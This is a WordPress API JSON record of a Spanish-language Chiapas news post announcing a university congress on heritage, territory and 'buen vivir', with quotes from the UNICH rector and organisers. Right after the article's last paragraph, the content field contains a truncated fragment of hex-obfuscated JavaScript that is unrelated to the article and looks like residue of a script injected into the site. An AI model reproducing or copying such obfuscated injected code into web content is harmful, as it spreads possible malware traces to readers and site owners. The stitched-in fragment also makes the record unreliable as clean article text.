{"id":5993,"date":"2022-10-20T03:07:02","date_gmt":"2022-10-20T03:07:02","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5993"},"modified":"2022-10-20T03:07:05","modified_gmt":"2022-10-20T03:07:05","slug":"todo-listo-para-el-segundo-congreso-internacional-patrimonio-territorio-y-buen-vivir","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5993","title":{"rendered":"Todo listo para el Segundo Congreso Internacional \u201cPatrimonio, Territorio y Buen Vivir\u201d"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-19-at-5.35.13-PM-1-1024x681.jpeg\" alt=\"\" class=\"wp-image-5995\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-19-at-5.35.13-PM-1-1024x681.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-19-at-5.35.13-PM-1-300x199.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-19-at-5.35.13-PM-1-768x511.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-19-at-5.35.13-PM-1-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-19-at-5.35.13-PM-1.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Leticia Pons Bonals, rectora de la Universidad Intercultural de Chiapas (UNICH) dio a conocer que del 25 al 27 de octubre, la sede central de esta casa de estudios, ser\u00e1 sede del Segundo Congreso Internacional \u201cPatrimonio, Territorio y Buen Vivir\u201d, el cual tiene programado 100 ponencias, distribuidas en 5 grupos  y 5 mesas de trabajo. \u201cInvitar a todas las personas interesadas a participar durante los d\u00edas del 25 al 27 de octubre, el objetivo de este evento es generar un espacio donde se puedan intercambiar y debatir las cuestiones que se relacionan con el patrimonio, el territorio y el buen vivir, abordando desde perspectivas te\u00f3ricas y metodol\u00f3gicas, epistemol\u00f3gicas y practicas que tienen que ver con el desarrollo de movimientos sociales, regionales, que nos permiten imaginar nuevas formas de vida\u201d, dijo. En conferencia de prensa, la Secretaria Acad\u00e9mica de la UNICH, Alma Rosa P\u00e9rez Trujillo, detall\u00f3 que cuentan con  100 ponencias, distribuidas en 5 grupos de trabajo y 5 mesas, entre ellas \u201cPatrimonio Biocultural, caracterizaciones ling\u00fc\u00edsticas e Interculturales\u201d, \u201cMigraci\u00f3n, Frontera y Pandemia\u201d, \u201cBuen vivir, G\u00e9nero, Econom\u00eda Social Solidaria\u201d, \u201cTerritorio en Disputa y Resistencias Sociales\u201d y \u201cTerritorio en Disputa y Resistencias Sociales\u201d. En este sentido, Enrique de Jes\u00fas Trejo S\u00e1nchez, Divisi\u00f3n de Procesos Naturales de la UNICH, indic\u00f3 que las actividades dar\u00e1n inicio a las 7 de la ma\u00f1ana con una ceremonia tradicional Tseltal, en el lugar sagrado de esta casa de estudios, y a las 9 de la ma\u00f1ana se proceder\u00e1 a realizar el acto inaugural a las 9 de la ma\u00f1ana, al que est\u00e1n todos invitados, donde se dar\u00e1 inici\u00f3 formalmente a la actividad. Por su lado Miguel S\u00e1nchez \u00c1lvarez, Coordinador del Segundo Congreso Internacional, explic\u00f3 que el realizar una ceremonia tradicional tiene como finalidad abordar la visi\u00f3n de los pueblos originarios, \u201cla importancia de una ritualidad en la petici\u00f3n, bienestar, colectivo de toda la universidad, del estado y el pa\u00eds\u201d. Destac\u00f3 que en el evento, se le entregar\u00e1 un reconocimiento al Doctor Eckart Boege Schmidt, por su trayectoria y aportes realizados en la investigaci\u00f3n y el debate sobre el patrimonio biocultural y el buen vivir de los pueblos originarios de M\u00e9xico.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Leticia Pons Bonals, rectora de la Universidad Intercultural de Chiapas (UNICH) dio a conocer que del 25 al 27 de octubre, la sede central de esta casa de estudios, ser\u00e1 sede del Segundo Congreso Internacional \u201cPatrimonio, Territorio y Buen Vivir\u201d, el cual tiene programado 100 ponencias, distribuidas en 5 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5994,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5993","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5993","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5993"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5993\/revisions"}],"predecessor-version":[{"id":5996,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5993\/revisions\/5996"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5994"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5993"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5993"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5993"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}